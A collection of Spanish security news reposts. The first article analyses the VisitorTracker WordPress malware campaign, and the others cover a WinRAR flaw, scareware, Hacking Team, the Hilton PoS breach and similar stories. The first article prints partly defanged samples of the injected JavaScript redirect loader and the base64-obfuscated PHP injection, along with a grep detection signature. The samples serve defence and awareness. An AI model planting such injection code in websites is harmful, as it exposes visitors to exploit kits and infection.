Malware en WordPress – Actualización de la Campaña VisitorTracker

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/malware-en-wordpress-actualizacion-de-la-campana-visitortracker/
TAGS: Malware, WordPress
En las últimas 3 semanas, hemos seguido una campaña de malware que compromete miles de sitios web de WordPress con código malicioso VisitorTracker.

Inicialmente, hemos publicado algunos detalles sobre este problema en este post:Malware de WordPress – Campaña Active VisitorTracker, pero como la campaña y el código malicioso han evoluido, hemos decidido fornecer una actualización sobre lo que está ocurriendo.

Para saber el tamaño de esta campaña, hemos registrado el número de sitios web comprometidos detectados en las últimas tres semanas:



Como se puede observar en el gráfico anterior, la campaña comenzó relativamente pequeña, alcanzó su punto máximo hace 10 días, dejó caer su ritmo y ganó impulso en los últimos 3 días.

Evolución del Malware

El código malicioso empezó muy simple. Modificó los encabezados y pies de página del sitio web y añadió un javascript para redirigir a los visitantes a la página de aterrizaje delNuclear Exploit Kit. Esas páginas intentaran utilizar un gran número de exploits de navegadores para infectar a los ordenadores de los visitantes.

Esa es una técnica muy común utilizada por los creadores de malware. Sigue el código:

var visitortrackerin = setInterval(function(){
if(document.body != null && typeof document.body != "undefined"){
clearInterval(visitortrackerin);
..
var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
if(visitorTracker_ isMob ())
var visitortrackervs [=] document.createElement("script'); visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch[.]php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
else{
if((isIE && !isChrome && !visitorTracker_isMob())){
var visitortrackervs = document [.] createElement("script"); visitortrackervs[.]src = "http://test.com/components/com_banners/models/main_configuration/watch.php"; document.getElementsByTagName("head")[0][.[appendChild(visitortrackervs);

 

 

Si usted comprende JavaScript, se puede ver que el código está creando otra llamada remota para cargar el contenido de un archivo watch.php en el sitio web comprometido. Este archivo, que controla la página Nuclear sería utilizado. También se utiliza este archivo para ocultar el malware de algunas direcciones IP y de usuarios con el objetivo de dificultar su detección.

Pero él ha evoluido…

El código original era fácil de encontrar y de hacer su debug, pero la última iteración es mucho más compleja. Ella incluía varias capas de cifrado y el resultado final fue una pieza de código inyectado en cada archivo Javascript del sitio web:



El código PHP también ha sido cambiado, pero permanece usando los arquivos del encabezado/pie de página. Ellos agregaron una obfuscación base64 simples:

<?php @ob_start( ); @ini_set('display_errors",0); @error_reporting(0)[;]echo base64_decode [(]"PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcH...

Si usted sospecha que su sitio web había ha sido comprometido, estos son nuevos indicios de compromiso que hay que buscar.

WordPress Exploit Kit

Además de la evolución de la campaña de malware por sí sola, hemos pasado las últimas 3 semanas intentando identificar cómo estos sitios web estaban siendo hackeados. Cuanto más sitios web investigábamos, más temas y plugins diferente víamos utilizarse en la campaña.

Podemos decir seguramente que no hay sólo una víctima: sea un plugin o un tema que se explora en esta campaña.

El grupo de malware malicioso detrás de esta campaña, en realidad, está utilizando un tipo de Exploit Kit para WordPress, que intenta combinar exploits para lograr sus objetivos. Algunas de las vulnerabilidades más comunes explotadas en este kit son:

• GravityForms RCE


• RevSlider RCE


• Contact Form 7 RFI


• TimThumb AFU (sí, aún timthumb)


• MailPoet AFU


• Intentos de ataques de fuerza bruta contra la cuenta admin

Otro factor que contribuye a la campaña se clasifica como cross-site-contaminations:
se utiliza un sitio web pequeño y menos importante para comprometer otros sitios web más importantes dentro del mismo servidor/cuenta. Esto sucede muy a menudo en entornos compartidos, donde un debug olvidado o un sitio web de prueba que no se actualizó son usados para comprometer todo el servidor.

¡Proteja sus sitios web!

Hemos detectado miles de sitios web comprometidos con este malware en las últimas 3 semanas, más del 92% son WordPress.

Si usted es un usuario de WordPress, asegúrese de mantener todos sus plugins actualizados, incluyendo los plugins premium. Escáner de Malware / Seguridad Gratuito (SiteCheck), para asegurarse de que no ha sido afectado por esta campaña. Si usted es un administrador del sistema y tiene acceso a su servidor, puede utilizar el siguiente comando (grep) para buscar infecciones en sus archivos:

grep -r “PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcH” /var/www/


Una vez identificada, se recomienda eliminar la infección y buscar otros indicadores de infección. Si necesita ayuda profesional, nuestro equipo de seguridad está listo para ayudarlo.

Fuente:https://blog.sucuri.net/

Noticias de seguridad informática

WinRAR sufre un importante fallo de seguridad

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/winrar-sufre-un-importante-fallo-de-seguridad/
TAGS: WinRAR

Uno de esos programas que nos suenan a todos, indistintamente del sistema operativo que utilicemos, es WinRAR, el compresor de ficheros que ha sido tan popular entre los usuarios de Windows la última década. Pero la popularidad no lo hace más seguro, ya que nos acabamos de enterar de que WinRAR 5.21 tiene un importante fallo de seguridad para los ordenadores con Windows.

Cuando un software popular tiene una vulnerabilidad grave, al igual que ya pasó con Internet Explorer en las versiones anteriores a Windows 10, la cosa se vuelve peligrosa, por lo que vamos a ver como asegurarnos de mantener nuestros ordenadores a salvo.

WinRAR 5.21: encontrada una vulnerabilidad grave

El investigador de seguridad Mohammad Reza ha encontrado una vulnerabilidad grave en el popular software de compresión WinRAR. En concreto, esta vulnerabilidad se encuentra en la versión 5.21 y afecta al sistema operativo Windows.

Este agujero de seguridad permitiría a un atacante infectar nuestro ordenador con malware desde un fichero comprimido con WinRAR únicamente con ejecutarlo, por lo que debemos seguir una serie de precauciones para evitar infectarnos:

Solución temporal para la vulnerabilidad en WinRAR 5.21

La vulnerabilidad aún no ha sido corregida, por lo que podemos tomar la iniciativa de desinstalar WinRAR 5.21 de nuestro ordenador y reinstalarlo cuando se haya solucionado en una versión posterior.

Tenemos alternativas como 7zip, gratuitas, que nos permitirán hacer las mismas funciones y sin comprometer la integridad de nuestros ordenadores, pero es una decisión personal de cada uno.

Si no queremos desinstalar WinRAR, debemos evitar a toda costa abrir archivos comprimidos con WinRAR que provengan de sitios poco seguros. El email, las redes sociales e incluso la navegación por páginas de dudosa reputación suelen ser uno de los mayores focos de la infección, por lo que es aconsejable evitarlos.

Un buen antivirus también puede crear una buena protección entre los atacantes y nuestros datos en el ordenador.

¿Qué te parece que WinRAR haya sufrido un importante fallo de seguridad? ¿Has borrado WinRAR de tu sistema o esperarás a que se solucione?

Fuente:http://www.elgrupoinformatico.com/

Noticias de seguridad informática

Durante unos días KickAss ha distribuido scareware

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/durante-unos-dias-kickass-ha-distribuido-scareware/
TAGS:

La utilización de los anuncios para distribuir estafas y virus informáticos es una tónica a la que los usuarios deben hacer frente, sobre todo si los ciberdelincuentes consiguen hacerse con el control de estos. Durante unos días, el portal de torrents KickAss ha distribuido un scareware en el que al usuario se le alertaba de que los datos de su equipo y de varios servicios estaban en peligro.

Con esto lo único que se quiere es que cunda el pánico entre los usuarios y que al final terminen llamando al número de teléfono que se facilita en la pantalla. Lo más curioso de todo esto es que se utiliza la tipografía del pantallazo azul de Windows, lo que quiere decir que el diseño pertenecía primero a otra estafa y se ha reaprovechado para esta. En ella se informa al usuario de que los datos de algunos servicios (como por ejemplo Facebook) se encuentran en peligro y que para lograr una mejor protección se debe recurrir a este número de teléfono.

Con unos 300 millones de visitantes diarios, se trata de una de las mejores páginas web para provocar que el usuarios pique y caiga en la estafa. La llamada a esta número repercute de forma negativa en la factura, ya que el importe final de esta se puede ver incrementado, pero este no es solo el problema.

Una llamada que puede salir cara

Y no solo en lo referido a la factura a pagar, el operador que atiende a la persona trata de convencer a esta de que debe ofrecerle acceso a las cuentas de los principales servicios para solucionar los problemas existentes de forma remota y así conseguir que sus datos queden expuestos. Evidentemente todo esto es mentira y lo único que quieren es conseguir que el usuario facilite las credenciales de acceso y así proceder al secuestro de las cuentas.

KickAss es solo un elemento más de una larga lista

Cada vez son más los sitios web que se ven afectados por este tipo de prácticas y muchas veces resulta mucho peor, ya que el usuario sin darse cuenta procede a la descarga de contenido malware que posteriormente se ejecutará pensando que se trata de un vídeo o de cualquier otro tipo de contenido legítimo, algo que seguro que la mayoría de los usuarios ha sufrido. En las últimas semanas también hemos hablado de cómo servicios publicitarios de Google y Yahoo! han distribuido anuncios que conducían a los usuarios a páginas infectadas con virus informáticos.

Por este motivo, los expertos en seguridad han tratado de estrechar el cerco a este tipo de prácticas y alertar cuando una de estas oleadas se esté distribuyendo utilizando los anuncios existentes en las páginas web.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

Navegador diseñado para test de penetración en aplicaciones Web.

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/navegador-disenado-para-test-de-penetracion-en-aplicaciones-web/
TAGS: Owasp, PenQ

PenQ es un navegador para Linux de código abierto creado para realizar test de penetración de aplicaciones web, construido sobre Mozilla Firefox. Viene configurado con herramientas de: búsquedas avanzada en Internet, fingerprinting, navegación anónima, escaneo de servidor web, fuzzing, generación de informes de resultados de test de penetración y muchos más. PenQ no es sólo una mezcla de complementos, viene configurado con algunas herramientas de código abierto muy poderosas programadas en Java y Python como:

• OWASP ZAP.


• OWASP WebScarab.


• OWASP WebSlayer.


• Escaner de servidores Web Nikto.


• Fuzzer de aplicaciones Web, Wfuzz.


• Con Tor integrado.


• Generador de informes de test de penetración.


• Base de datos con vulnerabilidades.


• Colección de Add-ons Mozilla: anonymoX, Awesome Screenshot, ChatZilla, CipherFox, Clear Console, Cookies Manager+, Cookie Monster, CryptoFox, Email Extractor, Firebug, FireFlow, FireFTP, FireSSH, Greasemonkey, Groundspeed, HackBar, HackSearch, Header Spy, HttpFox, HttpRequester, Java Deobfuscator, Library Detector, LinkSidebar, Proxy Selector, Proxy Tool, RefControl, RESTClient, Session Manager, SQL Inject Me, SQLite Manager, TrashMail.net, User Agent Switcher, Wappalyzer, Web Developer, Xinha Here! y XSS Me.

PenQ está configurado para ejecutarse en distribuciones basadas en Debian y sus distribuciones derivadas, incluyendo Ubuntu y los sistemas operativos de pruebas de penetración como: BackTrack y Kali. PenQ permite acceder a utilidades del sistema en ejecución y a las herramientas necesarias para ahorrar tiempo y hacer pruebas mucho más rápido. Posee herramientas integradas para la navegación anónima, supervisión del sistema, para tomar notas y programar tareas.

También proporciona manuales mediante enlaces a OWASP Testing Guide, una vasta fuente de conocimientos relacionados con las pruebas de seguridad.

Fuente:http://www.gurudelainformatica.es/

Noticias de seguridad informática

Datos de equipos médicos vulnerables expuestos online

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/datos-de-equipos-medicos-vulnerables-expuestos-online/
TAGS: Windows XP

Investigadores de seguridad han descubierto las vulnerabilidades de miles de sistemas médicos críticos. Scott Erven de Protiviti y Mark Collao de NeoHapsis notaron que muchas de estas máquinas están en riesgo de ser explotadas por atacantes, según reportó The Register.

Un ejemplo particularmente alarmante documentado por los expertos concierne a una importanteorganización de salud de Estados Unidos, cuyo nombre no se dio a conocer debido a la delicadeza de la situación. A través de Shodan, que se describe a sí mismo como “el primer motor de búsqueda de computadoras del mundo que permite buscar ordenadores en Internet”, encontraron que hasta 68.000 de sus sistemas y equipos médicos vulnerables habían sido expuestos.

El hecho de que miles de instituciones de la industria de la salud también se encontraron con sus equipamientos vulnerables expuestos sugiere que este es un hallazgo importante y oportuno. “Una vez que empezamos a cambiar [los términos buscados en Shodan] para apuntar a especialidades clínicas como radiología o podología o pediatría, encontramos miles con una mala configuración y vectores de ataque directos”, le dijo Erven al portal de noticias.

“No solo podrían robarse los datos sino que hay profundos impactos en la privacidad de los pacientes”, remarcó.

Su colega Collao añadió que los cibercriminales con acceso a tal información podrían en teoría generar inteligencia integral y comprensiva en las organizaciones sanitarias. Tan detallado podría ser tal conocimiento que incluso podrían saber en qué piso se alojan ciertos tipos de equipos y ordenadores.

Comentó que parte de la vulnerabilidad asociada a equipos médicos específicos se reduce a su anticuado sistema operativo. Muchos todavía usan versiones anteriores de Windows, como eldiscontinuado XP, lo que los deja vulnerables a múltiples ataques. Este parece ser un problema bastante extendido, ya que el mes pasado reportamos que 20.000 computadoras del NHS de Gales seguían usando Windows XP.

En este sentido, continuar usando un sistema operativo cuyo soporte técnico oficial ha sido discontinuado, y en el que por lo tanto se podrían presentar vulnerabilidades de tipo 0-day, es una actitud un tanto negligente en lo que refiere a la gestión de la seguridad.

Para mas detalles, pueden ver el siguiente video que muestra la presentación de Erven y Collao sobre sus hallazgos:

Fuente:http://www.welivesecurity.com/

Noticias de seguridad informática

Los correos robados a Hacking Team desvelan nuevos datos sobre estos piratas informáticos

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/los-correos-robados-a-hacking-team-desvelan-nuevos-datos-sobre-estos-piratas-informaticos/
TAGS: Hacking Team

Hacking Team es una empresa de origen italiano dedicada a la seguridad informática, aunque sobrepasando el límite de la moralidad. Esta empresa de seguridad se ha dedicado a desarrollar software espía y a aprovechar vulnerabilidades en el software para cumplir con sus contratos. Tras ser irónicamente víctimas se un ataque informático, una gran cantidad de información sobre el funcionamiento y sus clientes han salido a la luz, y poco a poco, a medida que se van analizando los datos robados, aparece en la red nueva información sobre esta compañía.

Los usuarios que han descargado de las redes de pares los datos robados de la compañía aún siguen analizando, poco a poco, esta información. Continuando con el análisis de los correos electrónicos de su directivo y sus trabajadores se han podido ver cómo varios altos cargos de Arabia Saudí querían comprar la empresa.

El CEO de la compañía, David Vincenzetti, estaba a favor de vender la compañía y trasladarla a un país donde no se firmara el Acuerdo de Wassenaar sobre control de exportaciones de armas y el uso de productos y tecnologías. De esta manera, Hacking Team podría hacer uso de su tecnología y exportarla a cualquier lugar del mundo sin ningún problema.

Finalmente la venta no se completó, aunque debemos tener en cuenta los peligros que de haberse completado los altos cargos de Arabia Saudí podrían haber tenido a su disposición toda la tecnología de esta compañía, la cual podrían haber utilizado sin limitaciones para espiar a prácticamente cualquier objetivo del mundo e incluso vender software malicioso a otros países similares interesados en ello.

Aún quedan muchos gigas de datos por analizar, y no se sabe lo que se puede encontrar de este grupo de piratas informáticos que se hacen llamar “hackers”. Por el momento tanto usuarios como empresas de seguridad siguen analizando la base de datos filtrada buscando información que pueda ser importante conocer como esta posible venta o vulnerabilidades que estaban siendo utilizadas por esta compañía para reportarlas a los desarrolladores correspondientes y que las puedan solucionar correctamente.

Recordamos que el gobierno de Estados Unidos, el gobierno de España e incluso la Policía Nacional y el CNI ha contratado en varias ocasiones los servicios de esta empresa para el desarrollo de software espía y la obtención de datos de diferentes objetivos difíciles de perseguir. Pese al ataque, la empresa sigue funcionando e incluso está desarrollando una nueva herramienta mucho más potente y segura que la anterior con la que buscará seguir brindando sus servicios a todo aquel interesado en ellos.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

Artillería rusa contra el malware

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-movil/artilleria-rusa-contra-el-malware/
TAGS: rusa, troyano

La seguridad y la privacidad de los usuarios a la hora de utilizar sus dispositivos, se han convertido en un elemento clave que las desarrolladoras de software y los propios fabricantes de dispositivos, deben tener muy en cuenta. Por eso, la mayor parte de las firmas tratan de mejorar estos aspectos con cada nuevo lanzamiento.

Las grandes marcas estadounidenses, europeas y asiáticas suelen llenar la actualidad en el ámbito de la tecnología con sus productos y en muchos casos, también desatan la polémica al publicarse informaciones sobre fallos de seguridad o de fabricación de sus dispositivos. Sin embargo, otras empresas menos conocidas, apuestan fuerte por la seguridad de sus usuarios. En este caso hablamos de Oysters, una firma rusa que se toma muy en serio la protección de sus clientes.

[caption id="attachment_2676" align="alignnone" width="690"] Artillería rusa contra el malware[/caption]

El modelo T104

Este terminal, lanzado por la firma rusa, es el primero que incluye un firmware capaz de identificar y eliminar archivos maliciosos del dispositivo. Pese a que sea comercializado principalmente en Rusia, está disponible en Europa en la cadena MediaMarkt.

La Guerra de Troya

El problema que los investigadores de la firma han encontrado en sus dispositivos, es un troyano oculto en el fichero de una app llamada GoogleQuickSearchBox. Este objeto, que es un viejo conocido en sistemas Android, recoge toda la información personal del usuario que se encuentre en el dispositivo infectado como la lista de aplicaciones instaladas o direcciones IP del dispositivo.

El usuario, indefenso

Aunque la misión principal de este malware sea obtener la mayor información posible del usuario y el robo de archivos importantes para enviarlos después a un servidor, uno de los grandes problemas que causa este archivo es que mientras actúa, el usuario no sabe que le están sustrayendo información muy valiosa. Por tanto, no sabe cuándo ni cómo debe actuar.

¿La solución?

Los propios desarrolladores del dispositivo afirman que la única acción que puede hacer el consumidor para erradicar este troyano es reiniciar por completo el dispositivo y el sistema operativo. Esto aumenta la pérdida de contenidos almacenados pero también garantiza que no se siga robando más información. Oysters recomienda ponerse en contacto con ellos en caso de ser víctima de uno de estos robos en uno de sus dispositivos.

Oysters no se queda quieta

Pese a que la firma de algunas soluciones que pueden aplicar los mismos usuarios desde sus terminales sin tener que recurrir al servicio técnico, no se ha quedado de brazos cruzados, y para ello, ha preinstalado actualizaciones contra virus y troyanos en la actualización de Android disponible en los modelos T104. Sin embargo, en anteriores terminales esta herramienta no se encuentra disponible, por lo que al usuario no le queda otra opción que extremar la precaución y equipar a su dispositivo con un buen antivirus para evitar la entrada de este tipo de archivos maliciosos.

La cautela es una de las claves a la hora de utilizar los dispositivos ya que este tipo de malware puede acabar truncando una buena experiencia de ocio, o perjudicar nuestro trabajo a la hora de utilizar las tablets. Protegiendo correctamente todo lo que almacenéis en vuestros terminales os ahorraréis más de un susto y podréis disfrutar más a la hora de estar con estas herramientas que ya se han convertido en algo indispensable en el día a día.

Fuente:http://tabletzona.es/

Noticias de seguridad informática

Un falso Avast Online distribuye malware entre sus víctimas

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/un-falso-avast-online-distribuye-malware-entre-sus-victimas/
TAGS: Avast Online distribuye malware

Los antivirus online son unas herramientas muy útiles que nos permiten comprobar archivos individuales, páginas web e incluso nuestros ordenadores completos en busca de virus, troyanos o software malicioso sin la necesidad de instalar ninguna aplicación en nuestro equipo, sólo desde el navegador web. Estas plataformas están ganando un gran protagonismo entre los usuarios, y los piratas informáticos son conscientes de ello, por lo que buscan posibles formas de aprovecharse de dicha fama.

Una vez más, aprovechando la fama y el prestigio de Facebook, la red social más utilizada en todo el mundo, los piratas informáticos han empezado a llevar a cabo una nueva campaña de distribución de malware. Bajo el falso dominio de “FacebookSecuriti“, un grupo de piratas informáticos, hasta ahora desconocidos, han creado una plataforma que busca aparentar un antivirus online utilizando para ello el nombre de Avast, uno de los principales antivirus gratuitos para Windows y uno de los más utilizados.

Cuando los usuarios caen en engaño, o phishing, y acceder a la URL maliciosa el navegador muestra una serie de páginas web pornográficas para posteriormente redirigir automáticamente a la víctima a la web de este falso antivirus online. Automáticamente empieza un análisis rápido de la seguridad del ordenador. Una vez finaliza dicho análisis nos informará de que estamos infectados por malware y que el único antivirus capaz de eliminar la amenaza es Avast.

La plataforma nos ofrece descargar automáticamente el antivirus en nuestro ordenador. Esta descarga, “avast.exe”, en realidad esconde un peligroso troyano que una vez infecta nuestro ordenador crea varias rutinas de arranque automático junto al sistema y establece una conexión con su servidor de comando y control, a la espera de empezar a funcionar.

Este troyano es utilizado principalmente para recopilar información sobre las víctimas. Dicha información la cifra y la envía al servidor controlado por el pirata informático, quien después probablemente la venda en el mercado negro.

Cómo evitar caer víctima de engaños como el falso antivirus de Avast

El primer aspecto que debería hacernos sospechar es que en la web de este falso antivirus online se utilizan varios motores de búsqueda de virus. Plataformas como VirusTotal sí que utilizan varios motores, pero porque ellos no tienen ni comercializan su propio motor, sin embargo, Avast sí que lo hace, y que desde su plataforma web utilice los motores de la competencia es sospechoso.

Ante la menos sospecha de amenaza debemos abandonar la página web inmediatamente, instalar un software de seguridad actualizado y analizar nuestro ordenador en busca de cualquier amenaza. Actualmente, los principales navegadores web como Firefox y las principales suites de seguridad para PC ya detectan y bloquean las conexiones a esta página web.

De todas formas, para asegurarnos de que no caemos en manos de estos piratas informáticos debemos evitar acceder siempre a enlaces sospechosos o mal escritos (como es el caso de “securiti”) y si queremos buscar una plataforma (por ejemplo, un antivirus online) hacerlo siempre desde Google e incluso desde las webs principales de las empresas de seguridad.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

VeraCrypt 1.15 soluciona dos nuevas vulnerabilidades heredadas de TrueCrypt

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/veracrypt-1-15-soluciona-dos-nuevas-vulnerabilidades-heredadas-de-truecrypt/
TAGS: TrueCrypt, VeraCrypt

El cifrado es la mejor forma de proteger nuestros datos de personas no autorizadas. Una de las aplicaciones más utilizadas para el cifrado de datos era TrueCrypt, una potente, libre y gratuita herramientas que, de la noche a la mañana, abandonó su desarrollo por motivos desconocidos. Gracias a su naturaleza OpenSource, terceros desarrolladores pudieron crear nuevas herramientas derivadas de la original, siendo una de las más fieles y utilizadas VeraCrypt.

Tras el abandono del desarrollo de TrueCrypt usuarios y empresas empezaron a auditar y analizar el código fuente con el fin de identificar si el motivo podría haber sido la causa del abandono y las aplicaciones derivadas podrían estar en peligro. Lejos de ser una herramienta vulnerable y peligrosa, TrueCrypt sí que tenía algunos fallos de seguridad considerables que, poco a poco, han ido saliendo a la luz y están siendo parcheados por los responsables de los nuevos proyectos.

A lo largo de este fin de semana los desarrolladores de VeraCrypt han publicado una nueva versión de la herramienta, 1.15, en la que principalmente se solucionan dos vulnerabilidades recientemente descubiertas en TrueCrypt y que afectaban igualmente a las versiones anteriores de VeraCrypt.

Las dos vulnerabilidades que han sido parcheadas en esta nueva versión son:

• CVE-2015-7358 – Una vulnerabilidad crítica. Permite la escalada de privilegios en Windows abusando de la asignación de letra de unidad.


• CVE-2015-7359 – Permite la escalada de privilegios debido a una incorrecta manipulación de variables.

Estas dos vulnerabilidades sólo pueden explotarse localmente, es decir, que un atacante debe tener acceso físico al sistema para poder aprovecharse de ellas. Igualmente indicar que en ningún momento afectan a los contenedores con los datos cifrados, sino que únicamente pueden llegar a ejecutar aplicaciones y comandos como “administradores” a través de estas vulnerabilidades.

VeraCrypt es compatible con los contenedores creados con TrueCrypt, sin embargo, si de verdad queremos estar seguros de que nuestros archivos no caen en malas manos la mejor opción es descifrarlos, extraer los archivos y volver a protegerlos en un nuevo contenedor creado con esta herramienta. Aunque el algoritmo de la primera aplicación aún no se ha visto comprometido nunca se sabe.

Muchos usuarios aún utilizan la versión 7.1a de TrueCrypt (última versión funcional). Como hemos visto con el paso de los meses, los investigadores de seguridad han descubierto varios fallos de seguridad en la herramienta base que pueden comprometer la seguridad de nuestros archivos más secretos, por lo que lo más recomendable es empezar a utilizar alternativas como VeraCrypt, que nos garantiza, a día de hoy, un gran mantenimiento y una sobresaliente seguridad.

Podemos descargar la versión más reciente (1.15) de esta herramienta desde su página web principal. Al igual que su predecesor, esta aplicación es totalmente gratuita y de código abierto.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

Roban datos de tarjetas de crédito usadas en hoteles Hilton

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/roban-datos-de-tarjetas-de-credito-usadas-en-hoteles-hilton/
TAGS: hoteles Hilton, point of sale o PoS

Los clientes que hayan usado sus tarjetas de crédito en hoteles Hilton o en locales dentro de ellos podrían ser víctimas del robo de datos bancarios: entidades financieras están investigando un patrón de actividad fraudulenta entre las que fueron usadas hacia mediados de abril y fines de julio de 2015.

La cadena está investigando el caso, ya que todo parece indicar que atacantes comprometieron registros de puntos de venta (point of sale o PoS) de tiendas de regalos, restaurantes y cafés situados en hoteles Hilton, así como en locales de franquicias en los Estados Unidos, segúnreportó el periodista Brian Krebs.

Visa participó de la investigación junto a cinco bancos, y se concluyó que las tarjetas que presentan actividades sospechosas o irregulares tienen en común haber sido usadas en alguno de ellos, incluyendo, además, a Embassy Suites, Doubletree, Hampton Inn & Suites y los hoteles de lujo Waldorf Astoria Hotels & Resorts.

La cadena de hoteles emitió el siguiente comunicado:

Hilton Worldwide está fuertemente comprometida con la protección de la información de tarjetas de crédito de nuestros clientes. Tenemos muchos sistemas implementados y trabajamos con algunos de los mejores expertos para ocuparnos de la seguridad de los datos.

Desafortunadamente la posibilidad de actividad fraudulenta con tarjetas de crédito es común para cualquier compañía en el mercado de hoy. Tomamos cualquier potencial problema muy seriamente y nos estamos ocupando de este asunto.

Al estar involucrados los locales de franquicias dentro de los complejos, lo más probable es que el sistema de reservas o de gestión utilizado por el personal no haya sido la puerta de entrada de los cibercriminales. Probablemente lo hayan sido dispositivos point of sale, que en el último tiempo han sido blancos de diversas amenazas que buscan otorgar rédito económico a quienes están detrás de ellas.

Los criminales están sumamente interesados en las máquinas lectoras de tarjetas,aprovechándose de su creciente uso en el sector de venta minorista. Es por eso que desarrollan nuevas técnicas delictivas, como la creación de malware específico para estos dispositivos, con el objetivo de llevar a cabo robos y fraudes financieros.

Además, a menudo no son debidamente protegidos: este año supimos del fabricante que usó la misma contraseña por defecto durante 25 años en el equipo, creyendo que su clave “166816” era única, y de otro que ni siquiera ingresó una, dejando el campo vacío.

Lo cierto es que las medidas necesarias para proteger una máquina de PoS son en gran parte las mismas medidas que se deben tomar para proteger cualquier otro equipo en Internet.

Fuente:http://www.welivesecurity.com/

Noticias de seguridad informática

Arabia Saudí estuvo a punto de comprar Hacking Team

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/arabia-saudi-estuvo-a-punto-de-comprar-hacking-team/
TAGS: Arabia Saudí, Hacking Team

Todos conocemos la historia detrás de Hacking Team, una compañía que se dedicaba a vender vulnerabilidades y herramientas de ciberespionaje gobiernos de todo el mundo, incluidos aquellos que no respetaban los derechos humanos, y que recibió una fuerte dosis de su propia medicina.

El caso es que parece que Arabia Saudí estuvo negociando la posibilidad de comprar Hacking Team, una operación en la que habría estado implicado el ex-embajador de Estados Unidos, Ronald Spogli, y que finalmente no llegó a buen puerto, ya que el encargado de las negociaciones por parte del país árabe, el príncipe Bandar bin Sultan, dejó de liderar el servicio nacional de inteligencia.

Todo lo expuesto está perfectamente desgranado entre los 400 GB de información que se filtró tras el ataque a Hacking Team, y demuestra la absoluta falta de ética de esta compañía que se jactaba de colaborar “única y exclusivamente” con gobiernos de países democráticos.

Especialmente interesante resulta también la implicación del citado diplomático estadounidense, un detalle que viene a confirmar algo que ya sabíamos, y es que el dinero no solo mueve montañas, sino que convierte enemigos en amigos y mueve a cambiar leyes, ética y moral, todo para perjuicio de los de siempre, los de abajo.

Fuente:http://www.muycomputer.com/

Noticias de seguridad informática

Google parchea un fallo crítico en el uso del protocolo TCP en el kernel de Linux

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/google-parchea-un-fallo-critico-en-el-uso-del-protocolo-tcp-en-el-kernel-de-linux/
TAGS: Google, TCP en el kernel de Linux

Hoy en día la mayor parte de los servidores conectados a Internet ejecutan un sistema operativo Linux por diferentes razones, entre ellas rendimiento, estabilidad y seguridad. Aunque Linux es un sistema operativo no comercial y mantenido principalmente por la comunidad, es el preferido por la mayoría de los administradores de sistemas de cara a brindar servicios a través de Internet, sin embargo, eso no quiere decir que Linux sea un sistema perfecto, y mucho menos, libre de fallos y vulnerabilidades.

En los últimos meses se están descubriendo (y solucionando) una serie de fallos en el núcleo de Linux (conocido como el kernel) que llevaban presentes más de 10 años debido a que hasta ahora no han sido apreciables, son desconocidos o que simplemente hasta ahora no han sido importantes para los desarrolladores y para los usuarios. La mayoría de estos fallos de larga duración no afectan directamente a la seguridad del sistema, pero sí pueden afectar seriamente al rendimiento del mismo.

Hace varios días, un grupo de ingenieros de Google identificaron un fallo crítico en el kernel de Linux relacionado directamente con la conectividad. Este fallo llevaba presente en el código del núcleo desde hace más de 10 años (siendo una de las vulnerabilidades más antiguas del mismo) y afectaba perjudicialmente sobre el rendimiento de las conexiones a Internet que utilizaban el protocolo TCP.

Este fallo crítico puede resumirse fácilmente como un fallo en la generación de informes de congestión de recursos internos. De este modo, las aplicaciones que envían una gran cantidad de datos a través de este protocolo, se detienen unos instantes y posteriormente empiezan a enviar de nuevo un gran número de datos perdían un gran número de paquetes al no ser capaz el sistema operativo de gestionar los cambios de estado correctamente.

Las consecuencias de este fallo son una gran pérdida de paquetes durante los intentos de conexión, la generación de un gran ancho de banda innecesario, errores en el orden de los paquetes y pérdida de permisos a nivel de aplicación. Los principales afectados por este fallo eran los servidores Web, ya que un usuario doméstico apenas notaría la congestión de datos (aunque también están afectados).

Al ser un fallo del núcleo del sistema operativo, prácticamente todas las distribuciones Linux estaban afectadas por él. Los usuarios que hacen un uso normal de la red probablemente no fueran conscientes del problema, sin embargo, perjudicaba a aquellos que transferían una gran cantidad de información a través de la red con el protocolo TCP.

Google publicó el correspondiente parche de seguridad hace ya varios días en la página del desarrollo del código del kernel de Linux. Este fallo llegará a la mayoría de las distribuciones con soporte a través de su correspondiente gestor de actualizaciones, aunque la mejor opción será actualizar manualmente a la versión del kernel más reciente para poder aprovechar también las mejoras que han sido desarrolladas e implementadas desde nuestra distribución actual.

Fuente:http://www.redeszone.net/

Noticias de seguridad informática

Lanzan un ataque DDoS contra CloudFlare utilizando dispositivos móviles

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-movil/lanzan-un-ataque-ddos-contra-cloudflare-utilizando-dispositivos-moviles/
TAGS: Ataque DDoS, dispositivos móviles

Los ataques informáticos cuyo origen es China comienzan a ser una constante y cada vez son más los servicios que sufren estos. Después de que GitHub haya sufrido este año más de tres ataques DDoS ahora el turno ha sido para el servicio CDN y prestador de servicios DNS CloudFlare. Los responsables de este ya lo han confirmado.

